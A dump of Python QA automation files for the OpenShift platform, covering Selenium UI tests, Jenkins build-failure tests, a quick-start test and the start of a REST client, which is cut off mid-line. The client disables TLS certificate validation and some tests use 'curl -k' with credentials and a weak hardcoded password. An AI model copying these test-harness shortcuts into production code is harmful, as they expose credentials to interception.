"is_vendor": false, "language": "Python", "length_bytes": 675, "license_type": "no_license", "max_line_length": 105, "num_lines": 28, "path": "/open_automation/bin/shutdown_instance.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\nimport os\nimport sys\nfile_path = os.path.dirname(os.path.realpath(__file__))\nlib_path = os.path.abspath(file_path + \"/../lib\")\nsys.path.append(lib_path)\nfrom helper import *\n\n\n\ndef main():\n usage = \"\"\"\nusage: %s -n instance_name\n\"\"\" %(os.path.basename(__file__))\n\n from optparse import OptionParser\n parser = OptionParser(usage=usage)\n parser.add_option(\"-n\", \"--instance_name\", dest=\"instance_name\", help=\"shut down specified instance\")\n\n (options, args) = parser.parse_args()\n #print \"-->\", options\n #print \"-->\", args\n shutdown_node(options.instance_name)\n\n\nif __name__ == \"__main__\":\n exit_code=main()\n sys.exit(exit_code)\n" }, { "alpha_fraction": 0.6680418848991394, "alphanum_fraction": 0.6743890643119812, "avg_line_length": 43.38028335571289, "blob_id": "3f08e649e59edd2614ecbee998e8652f4072dd63", "content_id": "f7c6ca837ac80d22cd28d2116cad73e391d34012", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3151, "license_type": "no_license", "max_line_length": 107, "num_lines": 71, "path": "/automation/open/testmodules/UI/web/US1797_135711.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "from selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import Select\nfrom selenium.common.exceptions import NoSuchElementException\nimport unittest, time, re\nimport baseutils\nimport HTMLTestRunner\n\nclass US1797135711(unittest.TestCase):\n def setUp(self):\n self.driver = \"\"\n self.base_url = \"\"\n self.profile = \"\"\n self.verificationErrors = []\n baseutils.initiate(self)\n\n \n def test_u_s1797135711(self):\n driver = self.driver\n baseutils.login(self,self.cfg.new_user,self.cfg.password)\n baseutils.go_to_account_page(self)\n\n driver.find_element_by_link_text(\"Change password...\").click()\n baseutils.wait_element_present_by_id(self,\"web_user_submit\")\n self.assertEqual(\"OpenShift by Red Hat | OpenShift Change Password\", driver.title)\n\n driver.find_element_by_id(\"web_user_old_password\").clear()\n driver.find_element_by_id(\"web_user_old_password\").send_keys(self.cfg.password)\n driver.find_element_by_id(\"web_user_password\").clear()\n new_password=\"abcabc\"\n driver.find_element_by_id(\"web_user_password\").send_keys(new_password)\n driver.find_element_by_id(\"web_user_password_confirmation\").clear()\n driver.find_element_by_id(\"web_user_password_confirmation\").send_keys(\"%s\\t\"%new_password)\n\n driver.find_element_by_id(\"web_user_submit\").click()\n baseutils.wait_element_present_by_link_text(self,\"Change password...\")\n self.assertEqual(\"OpenShift by Red Hat | My Account\", driver.title)\n\n baseutils.logout(self)\n baseutils.login(self,self.cfg.new_user, new_password)\n\n #and put it back\n baseutils.go_to_account_page(self)\n baseutils.wait_element_present_by_link_text(self,\"Change password...\")\n driver.find_element_by_link_text(\"Change password...\").click()\n\n baseutils.wait_element_present_by_id(self,\"web_user_submit\")\n self.assertEqual(\"OpenShift by Red Hat | OpenShift Change Password\", driver.title)\n driver.find_element_by_id(\"web_user_old_password\").clear()\n driver.find_element_by_id(\"web_user_old_password\").send_keys(new_password)\n driver.find_element_by_id(\"web_user_password\").clear()\n driver.find_element_by_id(\"web_user_password\").send_keys(self.cfg.password)\n driver.find_element_by_id(\"web_user_password_confirmation\").clear()\n driver.find_element_by_id(\"web_user_password_confirmation\").send_keys(\"%s\\t\"%self.cfg.password)\n driver.find_element_by_id(\"web_user_submit\").click()\n baseutils.wait_element_present_by_link_text(self,\"Change password...\")\n #and we should be back at my_account page\n self.assertEqual(\"OpenShift by Red Hat | My Account\", driver.title)\n\n \n def is_element_present(self, how, what):\n try: self.driver.find_element(by=how, value=what)\n except NoSuchElementException, e: return False\n return True\n \n def tearDown(self):\n self.driver.quit()\n self.assertEqual([], self.verificationErrors)\n\nif __name__ == \"__main__\":\n unittest.main()\n" }, { "alpha_fraction": 0.6991084814071655, "alphanum_fraction": 0.6991084814071655, "avg_line_length": 34.421051025390625, "blob_id": "cff02519d1bc1eccaec61d454fd43f7b9874f3ac", "content_id": "d3a77aefe421b88b96efd96fa4f41b4c857fc4f6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1346, "license_type": "no_license", "max_line_length": 226, "num_lines": 38, "path": "/automation/open/testmodules/RT/quick_start/quick_start_flask_mongo.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\nimport os, sys\n\nWORK_DIR = os.path.dirname(os.path.abspath(__file__))\ntestdir = os.path.normpath(WORK_DIR + \"/../../../\")\nsys.path.append(testdir)\n\nimport rhtest\nimport common\n# user defined packages\nfrom quick_start_test import QuickStartTest\n\nclass QuickStartMongoFlask(QuickStartTest):\n \n def __init__(self, config):\n rhtest.Test.__init__(self, config)\n self.config.application_type = common.app_types[\"python\"]\n self.config.application_embedded_cartridges = [ common.cartridge_types['mongodb'] ]\n self.config.summary = \"[Runtime][rhc-cartridge]quick-start example: Mongo Flask\"\n self.config.git_upstream_url = \"git://github.com/openshift/openshift-mongo-flask-example.git\"\n self.config.page = \"ws/parks\"\n self.config.page_pattern = \"Aztec Ruins National Monument\"\n\n def post_deployment_steps(self):\n common.run_remote_cmd(self.config.application_name, \"mongoimport -d parks -c parkpoints --type json --file $OPENSHIFT_REPO_DIR/parkcoord.json -h $OPENSHIFT_MONGODB_DB_HOST -u admin -p $OPENSHIFT_MONGODB_DB_PASSWORD\")\n \n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(QuickStartMongoFlask)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.5315574407577515, "alphanum_fraction": 0.546356737613678, "avg_line_length": 43.69260787963867, "blob_id": "7ea22e2d3bc4e5e417f905badcd6ecf5959cdfed", "content_id": "1b0fa9f87a80a02938ce5edefb3cd7f0fca219a5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 11487, "license_type": "no_license", "max_line_length": 227, "num_lines": 257, "path": "/automation/open/testmodules/RT/cartridge/jenkins_job_upon_fail_build.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n\"\"\"\nJiangtao Zhao\[email protected]\nFeb 10, 2012\n[US1178 & US1034] [rhc-cartridge] check jenkins functionality upon failed build\nhttps://tcms.engineering.redhat.com/case/122368/\n\"\"\"\nimport os, sys\nimport rhtest\nimport testcase, common, OSConf\n\n\nclass OpenShiftTest(rhtest.Test):\n def initialize(self):\n self.summary =\"[US1178 & US1034] [rhc-cartridge] check jenkins functionality upon failed build\"\n try:\n test_name = self.config.test_variant\n except:\n self.info(\"Missing OPENSHIFT_test_name, used `php`\")\n test_name='php'\n\n testname_to_file = { \"php\" : \"php/index.php\",\n \"rack\" : \"config.ru\",\n \"wsgi\" : \"wsgi/application\",\n \"python\" : \"wsgi/application\",\n \"perl\" : \"perl/index.pl\",\n \"jbossas\" : \"src/main/webapp/index.html\"}\n testname_to_file[\"zend\"] = testname_to_file[\"php\"]\n testname_to_file[\"ruby-1.9\"] = testname_to_file[\"rack\"]\n\n self.app_type = common.app_types[test_name]\n self.target_file = testname_to_file[test_name]\n self.app_name = test_name + \"jenkinsfail\"\n self.jenkins_name = \"jenkins\"\n\n common.env_setup()\n self.steps_list = []\n\n def finalize(self):\n pass\n\nclass JenkinsJobUponFailBuild(OpenShiftTest):\n def test_method(self):\n # 1.\n self.steps_list.append(testcase.TestCaseStep(\"Create a jenkins app\",\n common.create_app,\n function_parameters=[self.jenkins_name, \n \"jenkins-1.4\", \n self.config.OPENSHIFT_user_email, \n self.config.OPENSHIFT_user_passwd, \n False],\n expect_description=\"Jenkins app created success\",\n expect_return=0,\n expect_string_list=['Jenkins created successfully']))\n \n # 2.\n self.steps_list.append(testcase.TestCaseStep(\"Create an application of %s type\" %(self.app_type),\n common.create_app,\n function_parameters=[self.app_name, \n self.app_type, \n self.config.OPENSHIFT_user_email, \n self.config.OPENSHIFT_user_passwd],\n expect_description=\"app created success\",\n expect_return=0))\n\n # 3.\n self.steps_list.append(testcase.TestCaseStep(\"Embed jenkins client to app\",\n common.embed,\n function_parameters=[self.app_name, 'add-jenkins-client-1.4', self.config.OPENSHIFT_user_email, self.config.OPENSHIFT_user_passwd],\n expect_string_list=['Jenkins client 1.4 has been added to %s' %(self.app_name)],\n expect_description=\"Embed jenkins to app success\",\n expect_return=0,\n try_count=3,\n try_interval=5))\n # 4.\n self.steps_list.append(testcase.TestCaseStep(\"Got jenkins app url\",\n OSConf.get_app_url,\n function_parameters=[self.jenkins_name]))\n\n # 5.\n self.steps_list.append(testcase.TestCaseStep(\"Got app url\",\n OSConf.get_app_url,\n function_parameters=[self.app_name]))\n\n # 6.\n self.steps_list.append(testcase.TestCaseStep(\"Do some change to app's index page\",\n \"sed -i 's/Welcome to OpenShift/Welcome~~~/g' %s/%s \" %(self.app_name, self.target_file),\n expect_return=0,))\n\n # 7.\n self.steps_list.append(testcase.TestCaseStep(\"Modify .openshift/action_hooks/pre_build\",\n \"\"\"echo -e '#! /bin/bash\\necho \"----Pre_Build Fail Test----\"\\nexit 1' >%s/.openshift/action_hooks/pre_build; \\n chmod +x %s/.openshift/action_hooks/pre_build\"\"\" %(self.app_name, self.app_name),\n expect_return=0))\n # 8.\n self.steps_list.append(testcase.TestCaseStep(\"Triger jenkins build\",\n common.trigger_jenkins_build,\n function_parameters=[self.app_name, 1],\n expect_return=False))\n\n # 9.\n self.steps_list.append(testcase.TestCaseStep(\"Get jenkins username and password\",\n self.get_jenkins_username_password,\n function_parameters=[OSConf.default, self.jenkins_name]))\n # 10.\n self.steps_list.append(testcase.TestCaseStep(\"Check output console of jenkins job\",\n \"curl -s -k -u __OUTPUT__[9][0]:__OUTPUT__[9][1] -H 'Pragma: no-cache' https://__OUTPUT__[4]/job/%s-build/1/console\" %(self.app_name),\n expect_return=0,\n expect_string_list=['----Pre_Build Fail Test----'],\n try_count=4,\n try_interval=10))\n # 11.\n self.steps_list.append(testcase.TestCaseStep(\"Check output of app\",\n \"curl -s -H 'Pragma: no-cache' __OUTPUT__[5]\",\n expect_return=0,\n expect_string_list=['Welcome to OpenShift'],\n unexpect_string_list=['Welcome~~~'],\n try_count=4,\n try_interval=10))\n\n # 12.\n self.steps_list.append(testcase.TestCaseStep(\"Restore .openshift/action_hooks/pre_build\",\n \"rm %s/.openshift/action_hooks/pre_build\" %(self.app_name),\n expect_return=0))\n\n # 13.\n self.steps_list.append(testcase.TestCaseStep(\"Modify .openshift/action_hooks/build\",\n \"\"\"echo -e '#/bin/bash\\necho \"----Build Fail Test----\"\\nexit 1' >%s/.openshift/action_hooks/build; \\n chmod +x %s/.openshift/action_hooks/build\"\"\" %(self.app_name, self.app_name),\n expect_return=0))\n\n # 14.\n self.steps_list.append(testcase.TestCaseStep(\"Triger jenkins build\",\n common.trigger_jenkins_build,\n function_parameters=[self.app_name, 1],\n expect_return=False))\n\n # 15.\n self.steps_list.append(testcase.TestCaseStep(\"Check output console of jenkins job\",\n \"curl -s -k -u __OUTPUT__[9][0]:__OUTPUT__[9][1] -H 'Pragma: no-cache' https://__OUTPUT__[4]/job/%s-build/2/console\" %(self.app_name),\n expect_return=0,\n expect_string_list=['----Build Fail Test----'],\n try_count=4,\n try_interval=10))\n\n # 16.\n self.steps_list.append(testcase.TestCaseStep(\"Check output of app\",\n \"curl -s -H 'Pragma: no-cache' __OUTPUT__[5]\",\n expect_return=0,\n expect_string_list=['Welcome to OpenShift'],\n unexpect_string_list=['Welcome~~~'],\n try_count=4,\n try_interval=10))\n\n # 17.\n self.steps_list.append(testcase.TestCaseStep(\"Restore .openshift/action_hooks/build\",\n \"rm %s/.openshift/action_hooks/build\" %(self.app_name),\n expect_return=0))\n\n # 18.\n self.steps_list.append(testcase.TestCaseStep(\"Modify .openshift/action_hooks/deploy\",\n \"\"\"echo -e '#!/bin/bash\\necho \"----Deploy Fail Test----\"\\nexit 1' >%s/.openshift/action_hooks/deploy; \\n chmod +x %s/.openshift/action_hooks/deploy\"\"\" %(self.app_name, self.app_name),\n expect_return=0,))\n\n # 19.\n self.steps_list.append(testcase.TestCaseStep(\"Triger jenkins build\",\n common.trigger_jenkins_build,\n function_parameters=[self.app_name, 1],\n expect_return=False))\n\n # 20.\n self.steps_list.append(testcase.TestCaseStep(\"Check output console of jenkins job\",\n \"curl -s -k -u __OUTPUT__[9][0]:__OUTPUT__[9][1] -H 'Pragma: no-cache' https://__OUTPUT__[4]/job/%s-build/3/console\" %(self.app_name),\n expect_return=0,\n expect_string_list=['----Deploy Fail Test----'],\n try_count=4,\n try_interval=10))\n\n # 21.\n self.steps_list.append(testcase.TestCaseStep(\"Check output of app\",\n \"curl -s -H 'Pragma: no-cache' __OUTPUT__[5]\",\n expect_return=0,\n expect_string_list=['503 Service Temporarily Unavailable'],\n unexpect_string_list=['Welcome~~~', 'Welcome to OpenShift'],\n try_count=4,\n try_interval=10))\n # 22.\n self.steps_list.append(testcase.TestCaseStep(\"Restore .openshift/action_hooks/deploy\",\n \"rm %s/.openshift/action_hooks/deploy\" %(self.app_name),\n expect_return=0))\n\n # 23.\n self.steps_list.append(testcase.TestCaseStep(\"Modify .openshift/action_hooks/post_deploy\",\n \"\"\"echo -e '#!/bin/bash\\necho \"----Post_Deploy Fail Test----\"\\nexit 1' >%s/.openshift/action_hooks/post_deploy; \\n chmod +x %s/.openshift/action_hooks/post_deploy\"\"\" %(self.app_name, self.app_name),\n expect_return=0))\n\n # 24.\n self.steps_list.append(testcase.TestCaseStep(\"Triger jenkins build\",\n common.trigger_jenkins_build,\n function_parameters=[self.app_name, 1],\n expect_return=False))\n # 25.\n self.steps_list.append(testcase.TestCaseStep(\"Check output console of jenkins job\",\n \"curl -s -k -u __OUTPUT__[9][0]:__OUTPUT__[9][1] -H 'Pragma: no-cache' https://__OUTPUT__[4]/job/%s-build/4/console\" %(self.app_name),\n expect_return=0,\n expect_string_list=['----Post_Deploy Fail Test----'],\n try_count=4,\n try_interval=10))\n\n # 26.\n self.steps_list.append(testcase.TestCaseStep(\"Check output of app\",\n \"curl -s -H 'Pragma: no-cache' __OUTPUT__[5]\",\n expect_return=0,\n expect_string_list=['Welcome~~~'],\n unexpect_string_list=['Welcome to OpenShift'],\n try_count=4,\n try_interval=30))\n\n # 27.\n self.steps_list.append(testcase.TestCaseStep(\"Restore .openshift/action_hooks/post_deploy\",\n \"rm %s/.openshift/action_hooks/post_deploy\" %(self.app_name),\n expect_return=0))\n\n # 28.\n self.steps_list.append(testcase.TestCaseStep(\"Triger jenkins build\",\n common.trigger_jenkins_build,\n function_parameters=[self.app_name,],\n expect_return=True))\n\n case = testcase.TestCase(self.summary, self.steps_list)\n try:\n case.run()\n except testcase.TestCaseStepFail:\n return self.failed(\"%s failed\" % self.__class__.__name__)\n\n if case.testcase_status == 'PASSED':\n return self.passed(\"%s passed\" % self.__class__.__name__)\n if case.testcase_status == 'FAILED':\n return self.failed(\"%s failed\" % self.__class__.__name__)\n\n def get_jenkins_username_password(self, user, jenkins_name):\n return (user.conf[\"apps\"][jenkins_name][\"username\"], user.conf[\"apps\"][jenkins_name][\"password\"])\n\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(JenkinsJobUponFailBuild)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n\n#\n# vim: set tabstop=4:shiftwidth=4:expandtab: \n" }, { "alpha_fraction": 0.6393781304359436, "alphanum_fraction": 0.6628203392028809, "avg_line_length": 60.43283462524414, "blob_id": "6f1c73a54d1c12668c55d0e40e2a5da08463f44a", "content_id": "db3a16ffe945b600133dc4ce4fac05331ca83d18", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 8233, "license_type": "no_license", "max_line_length": 808, "num_lines": 134, "path": "/automation/open/testmodules/UI/web/case_122353.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# coding=utf-8\n#\n# File name: case_122353.py\n# Date: 2012/07/24 10:56\n# Author: [email protected] \n#\n\nimport rhtest\nimport time\n\nclass OpenShiftTest(rhtest.Test):\n def initialize(self):\n pass\n\n def finalize(self):\n pass\n\n\nclass Check_platform(OpenShiftTest):\n def test_method(self):\n web = self.config.web\n web.go_to_platform()\n \n #Assert all the elements on platform page.\n web.assert_text_equal_by_css('''About the OpenShift Platform as a Service (PaaS)''',\n '''div.ribbon-content''')\n \n web.assert_text_equal_by_xpath('''OpenShift takes care of all the infrastructure, middleware, and management and allows the developer to focus on what they do best: designing and coding applications.''', '''//div[@id='node-11589']/div/p[2]''')\n \n web.assert_text_equal_by_xpath('How do I use OpenShift?', '''//div[@id='node-11589']/div/h2''')\n \n web.assert_text_equal_by_xpath('For a Developer to use OpenShift to take advantage of the power and elasticity of the Cloud, they need only do the following:',\n '''//div[@id='node-11589']/div/p[3]''')\n \n web.assert_text_equal_by_xpath('''Create an \"Application\" in OpenShift (With the command-line or via their IDE)''',\n '''//div[@id='node-11589']/div/ol/li''')\n \n web.assert_text_equal_by_xpath('Code the application (in Vi, TextMate, Eclipse, Visual Studio, or whatever)',\n '''//div[@id='node-11589']/div/ol/li[2]''')\n \n web.assert_text_equal_by_xpath('''Push the application code to OpenShift (again, with the command-line or from their IDE)''',\n '''//div[@id='node-11589']/div/ol/li[3]''')\n \n web.assert_text_equal_by_xpath('''Here's an example of the command-line approach (in this case the application was already coded and resident in the github repository):''',\n '''//div[@id='node-11589']/div/p[4]''')\n \n web.assert_text_equal_by_xpath('''That's all there is to it. Simple, right?''',\n '''//div[@id='node-11589']/div/p[5]''')\n \n web.assert_text_equal_by_xpath('Read more about getting started',\n '''//div[@id='node-11589']/div/p[6]/a''')\n \n web.assert_text_equal_by_xpath('Code anything',\n '''//div[@id='node-11589']/div/h2[2]''')\n \n web.assert_text_equal_by_xpath('''OpenShift takes a No-Lock-In approach to PaaS by providing built-in support for Node.js, Ruby, Python, PHP, Perl, and Java (the standard in today's Enterprise). In addition, OpenShift is extensible with a customizable cartridge functionality that allows enterprising developers to add any other language they wish. We've seen everything from Clojure to Cobol running on OpenShift.''',\n '''//div[@id='node-11589']/div/p[7]''')\n \n web.assert_text_equal_by_xpath('''In addition to this flexible, no-lock-in, language approach, OpenShift supports many of the popular frameworks that make a developer's life easier including frameworks ranging from Spring, to Rails, to Play. OpenShift is designed to allow Developers to work the way they want to work by giving them the languages, frameworks and tools they need for fast and easy application development.''',\n '''//div[@id='node-11589']/div/p[8]''')\n \n web.assert_text_equal_by_xpath('Blow the doors off your expectations',\n '''//div[@id='node-11589']/div/h2[3]''')\n \n web.assert_text_equal_by_xpath('Once you have your application running in the Cloud, the next thing to worry about is how it is going to handle the massive amount of usage it gets when it goes viral. Well, no worries here. OpenShift has you covered.',\n '''//div[@id='node-11589']/div/p[9]''')\n \n web.assert_text_equal_by_xpath('With Auto-Scaling, OpenShift can scale your application by adding additional instances of your application and enabling clustering. Alternatively, you can manually scale the amount of resources with which your application is deployed when needed. When your big idea takes off, OpenShift will allow it to soar.',\n '''//div[@id='node-11589']/div/p[11]''')\n \n web.assert_text_equal_by_xpath('''Under the Hood''',\n '''//div[@id='node-11589']/div/h2[4]''')\n \n web.assert_text_equal_by_xpath('''OpenShift by Red Hat is built on open-source technologies (we are one of the world's leading open source companies, after all). A decade of enhancements in these technologies contributed by the open source community has resulted in a set of very robust technology components that provide the inner-workings of the OpenShift PaaS.''',\n '''//div[@id='node-11589']/div/p[12]''')\n \n web.assert_text_equal_by_xpath('''OpenShift is built on a foundation of Red Hat Enterprise Linux (RHEL). Beyond being a leading and well respected Linux distro, RHEL provides some key capabilities that allow OpenShift to be stable, responsive, performant and secure. OpenShift leverages the multitenancy and security models within RHEL to provide fine-grained and trusted control over the compute and storage resources available to any single OpenShift application. SELinux allows OpenShift to \"firewall\" one user's application from another in order to insure security and survivability. Taking a \"multi-tenant in the OS\" approach vs. a \"multi-tenant hypervisor\" approach allows OpenShift to scale resources much more quickly so that your application will never lack the horsepower that it needs.''',\n '''//div[@id='node-11589']/div/p[13]''')\n \n web.assert_text_equal_by_xpath('''Add on top of RHEL, a full selection of open source Languages, Frameworks, and Middleware combined with a \"Cartridge\" approach that allows users to very easily select the components that their applications need whether it is a NoSQL datastore or a Business Intelligence analytics engine.''',\n '''//div[@id='node-11589']/div/p[14]''')\n \n web.assert_text_equal_by_xpath('''Easy-peasy''',\n '''//div[@id='node-11589']/div/h2[5]''')\n \n web.assert_text_equal_by_xpath('''OpenShift is designed to provide one thing for Developers: Ease of Use without Worries. OpenShift's mission is to make your job easier by taking care of all the messy IT aspects of app development and allowing you to focus on your job: Coding your Application and satisfying your customers.''',\n '''//div[@id='node-11589']/div/p[15]''')\n \n web.assert_text_equal_by_xpath('''Pricing''',\n '''//div[@id='node-11589']/div/h2[6]''')\n \n web.assert_text_equal_by_xpath('''A free Developer Preview version of OpenShift has been available for the past year. Based on requests from users for expanded capability, we are planning to expand the OpenShift offering to provide users increased capacity, functionality and support. Check the OpenShift Pricing page for an overview of what we intend to offer when a paid OpenShift service becomes available.''',\n '''//div[@id='node-11589']/div/p[16]''')\n \n\n #check the links\n #Read more about getting started\n web.go_to_platform()\n web.click_element_by_xpath('''//div[@id='node-11589']/div/section/a/div''')\n time.sleep(2)\n web.check_title(\"Get Started with OpenShift | OpenShift by Red Hat\")\n \n #Read the Getting Started Guide\n web.go_to_platform()\n web.click_element_by_xpath('''//div[@id='node-11589']/div/section/a/div[2]''')\n web.check_title(\"Get Started with OpenShift | OpenShift by Red Hat\")\n \n self.tearDown()\n\n return self.passed(\"Case 122353 test passed.\")\n\n\n def tearDown(self):\n self.config.web.driver.quit()\n self.assert_equal([], self.config.web.verificationErrors)\n\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(Check_platform)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n\n#\n# end of case_122353.py \n#\n# vim: set tabstop=4:shiftwidth=4:expandtab: \n" }, { "alpha_fraction": 0.5428172945976257, "alphanum_fraction": 0.5506480932235718, "avg_line_length": 35.88074493408203, "blob_id": "d2d9694091cf75d63f2d7d6bd494f850ea79ce53", "content_id": "579ca0007e37d69bf0b3c3e999464ef692de8d65", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 33713, "license_type": "no_license", "max_line_length": 135, "num_lines": 914, "path": "/automation/open/lib/openshift.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n\n\"\"\"\nThis files contains utility classes that are Openshift related.\n\n\"\"\"\n\n#import urllib2 as urllib\nimport urllib\nimport socks\nimport httplib2\nimport base64\nimport os\nimport json\nimport exceptions\nimport sys\nfrom optparse import OptionParser\nfrom common import CONNECT_TIMEOUT\nimport time\nimport traceback\n\nimport clog\n\n\nclass OpenShiftException(exceptions.BaseException):\n pass\n\nclass OpenShiftLoginException(OpenShiftException):\n \"\"\"Authorization failed.\"\"\"\n pass\n\nclass OpenShiftNullDomainException(OpenShiftException):\n \"\"\"User's domain hasn't been initialized.\"\"\"\n pass\n\nclass OpenShift500Exception(OpenShiftException):\n \"\"\"Internal Server Error\"\"\"\n pass\n\n#### set this to True if we want to enable performance analysis\nDOING_PERFORMANCE_ANALYSIS=False\n\n\ndef config_parser():\n # these are required options.\n parser.set_defaults(VERBOSE=False)\n parser.set_defaults(DEBUG=False)\n parser.add_option(\"-d\", action=\"store_true\", dest=\"DEBUG\", help=\"enable DEBUG (default true)\")\n #parser.add_option(\"-a\", \"--action\", help=\"action you want to take (list|create|store)\")\n parser.add_option(\"-i\", \"--ip\", default=\"openshift.redhat.com\", help=\"ip addaress of your devenv\")\n parser.add_option(\"-v\", action=\"store_true\", dest=\"VERBOSE\", help=\"enable VERBOSE printing\")\n parser.add_option(\"-u\", \"--user\", default=None, help=\"User name\")\n parser.add_option(\"-p\", \"--password\", default=None, help=\"RHT password\")\n (options, args) = parser.parse_args()\n \n if options.user is None:\n options.user = os.getenv('OPENSHIFT_user_email')\n \n if options.password is None:\n options.password = os.getenv('OPENSHIFT_user_passwd')\n\n return options, args\n\n\nlog = clog.get_logger()\nparser = OptionParser()\n\n\n# helper function for to measure timedelta.\ndef timeit(method):\n\n def timed(*args, **kw):\n ts = time.time()\n result = method(*args, **kw)\n te = time.time()\n\n log.info(\"%r (%r, %r) %2.2f sec\" % (method.__name__, args, kw, te-ts))\n return result\n\n return timed\n\nclass conditional_decorator(object):\n def __init__(self, dec, condition):\n self.decorator = dec\n self.condition = condition\n\n def __call__(self, func):\n if not self.condition:\n return func\n else:\n return self.decorator(func)\n\nclass Response(object):\n \"\"\"\n A base Response class to derive from. Handle the JSON response from the\n REST API\n\n \"\"\"\n json = None\n body = None\n status = None\n headers = {}\n error = None\n url = None\n debug = False\n\n def __init__(self, response, body, base_url, debug=False):\n self.body = body\n self.status = response.status\n self.headers = response.items()# TODO: dict(response.getheaders())\n self.error = response.reason\n self.url = base_url\n self.parse_body()\n self.data = None\n\n def parse_body(self):\n \"\"\"\n call JSON library to translate string JSON response to a JSON object \n \"\"\"\n if len(self.body) > 2: # just in cases where API return just '{}'\n try:\n self.json = json.loads(self.body)\n except:\n return self.body\n\n # the acutal JSON response is key by the url (w/o the leading slash\n self.data =self.json['data']\n else:\n self.data = None\n\n if self.debug:\n self.pprint()\n\n return self.data\n\n def pprint(self): # pretty print\n \"\"\" do pretty print of JSON response \"\"\"\n print json.dumps(self.json, sort_keys=True, indent=2)\n\n def __unicode__(self):\n return self.pprint(self.json)\n\nclass RestApi(object):\n \"\"\"\n A base connection class to derive from.\n \"\"\"\n\n connection = None\n host = None\n port = (80, 443)\n secure = 1 # 0 or 1\n username = None\n password = None\n responseCls = Response\n headers = None\n response = None\n base_uri_root = '/broker/rest'\n base_uri = None\n verbose = False\n debug = False\n\n def __init__(self, host, port=80, username=username, password=password,\n debug=False, verbose=False, secure=True):\n self.host = host\n self.base_uri = 'https://%s/%s'%(host,self.base_uri_root)\n\n if username:\n self.username = username\n\n if password:\n self.password = password\n\n if verbose:\n self.verbose = verbose\n\n self.debug = debug\n\n proxy = None\n if os.getenv('http_proxy'):\n import re\n obj = re.search(r\"http://([^:]+):(\\d+)\", os.getenv('http_proxy'))\n if obj:\n proxy_host = obj.group(1)\n proxy_port =int(obj.group(2))\n proxy = httplib2.ProxyInfo(proxy_type=socks.PROXY_TYPE_HTTP, proxy_host=proxy_host, proxy_port=proxy_port)\n else:\n log.error(\"Warning: Wrong format of http_proxy!\")\n\n self.connection = httplib2.Http(cache=None, timeout=CONNECT_TIMEOUT, proxy_info=proxy, disable_ssl_certificate_validation=True)\n\n def connect(self, host=None, port=80, headers=None):\n if host:\n self.host = host\n\n if port:\n self.port = port \n else:\n self.port = self.port[self.secure]\n kwargs = {'host': host, 'port': port, 'timeout': CONNECT_TIMEOUT}\n connection = httplib2.Http(**kwargs)\n self.connection = connection\n return connection\n\n def _get_auth_headers(self, username=None, password=None):\n if username:\n self.username = username\n if password:\n self.password = password\n\n return {\n \"Content-type\": \"application/x-www-form-urlencoded\",\n 'Authorization':\n \"Basic %s\"\n % base64.b64encode('%s:%s' % (self.username, self.password)),\n 'Accept': 'application/json'\n }\n\n\n def request(self, url, method, headers=None, params=None):\n conn = self.connection\n if url.startswith(\"https://\") or url.startswith(\"http://\") :\n self.url = url\n else:\n self.url = self.base_uri + url\n\n log.debug(\"URL: %s\" % self.url)\n if self.headers is None:\n self.headers = self._get_auth_headers(self.username, self.password)\n else:\n self.headers.update(self._get_auth_headers(self.username, self.password))\n if headers is not None:\n self.headers.update(headers)\n\n response = None\n content = None\n try:\n if method == 'GET':\n (response, content) = conn.request(uri=self.url, method=method, headers=self.headers)\n else:\n (response, content) = conn.request(uri=self.url, method=method, body=params, headers=self.headers)\n\n except Exception as e:\n print >>sys.stderr, \"-\"*80\n traceback.print_exc(file=sys.stderr)\n print >>sys.stderr, \"-\"*80\n raise e\n\n raw_response = content\n self.response = Response(response, content, self.url)\n self.data = self.response.parse_body()\n\n # Workaround for bug 913796\n #add some debug messages if response is else than OK\n '''\n if self.response.error not in ('OK', 'Created', 'Not Content'):\n print >>sys.stderr, \"-\"*80\n log.debug(\"Response of non 'OK' [status/data]: %s/%s\"%(self.response.error, self.data))\n print >>sys.stderr, \"-\"*80\n '''\n if self.response.status == 200:\n status = 'OK'\n else:\n status = self.response.error\n return (status, raw_response)\n \n\n def GET(self, url):\n \"\"\" wrapper around request() \"\"\"\n url = self.base_uri\n res = self.request(url, method=\"GET\")\n return res\n\n def POST(self, data):\n \"\"\" do a REST API POST \"\"\"\n return self.connection.request(url=self.url, headers=self.headers, body=data, method='POST')\n \n def PUT(self, url, data):\n return self.connection.request(url=self.url, params=data, method='PUT')\n\nclass Openshift(object):\n \"\"\"\n wrappers class around REST API so use can use it with python\n \"\"\"\n rest = None\n user = None\n passwd = None\n def __init__(self, host, user=None, passwd=None, debug=False, verbose=False, logger=None):\n if user:\n self.user = user\n if passwd:\n self.passwd = passwd\n if logger:\n global log\n log = logger\n self.rest = RestApi(host=host, username=self.user, password=self.passwd, debug=debug, verbose=verbose)\n \n def get_href(self, top_level_url, target_link, domain_name=None):\n status, res = self.rest.request(method='GET', url=top_level_url)\n index = target_link.upper()\n if status == 'Authorization Required':\n #log.error(\"Authorization failed. (Check your 